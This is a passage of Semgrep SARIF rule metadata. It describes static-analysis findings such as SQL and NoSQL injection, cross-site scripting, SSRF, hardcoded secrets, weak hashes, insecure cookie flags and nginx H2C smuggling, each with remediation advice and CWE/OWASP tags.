proxy."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","id":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","name":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","id":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","name":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection","id":"java.lang.security.audit.el-injection.el-injection","name":"java.lang.security.audit.el-injection.el-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.el-injection.el-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint","id":"rust.rocket.nosql.mongodb-taint.mongodb-taint","name":"rust.rocket.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"help":{"markdown":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string","id":"java.spring.security.injection.tainted-html-string.tainted-html-string","name":"java.spring.security.injection.tainted-html-string.tainted-html-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-html-string.tainted-html-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","id":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","name":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","id":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","name":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","id":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","name":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli)\n - [https://www.npmjs.com/package/pg](https://www.npmjs.com/package/pg)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli","id":"javascript.express.pg.express-pg-sqli.express-pg-sqli","name":"javascript.express.pg.express-pg-sqli.express-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.pg.express-pg-sqli.express-pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"help":{"markdown":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate)\n - [https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345](https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345)\n","text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","id":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","name":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"help":{"markdown":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off)\n - [https://docs.djangoproject.com/en/3.1/ref/settings/#templates](https://docs.djangoproject.com/en/3.1/ref/settings/#templates)\n - [https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates](https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates)\n","text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","id":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","name":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.context-autoescape-off.context-autoescape-off"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"help":{"markdown":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","id":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","name":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","properties":{"precision":"very-high","tags":["CWE-406: Insufficient Control of Network Message Volume (Network Amplification)","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"help":{"markdown":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling)\n - [https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c](https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c)\n","text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","id":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","name":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","id":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","name":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","id":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","name":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash","id":"cpp.lang.security.crypto.insecure-hash.insecure-hash","name":"cpp.lang.security.crypto.insecure-hash.insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.insecure-hash.insecure-hash"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","id":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","name":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security 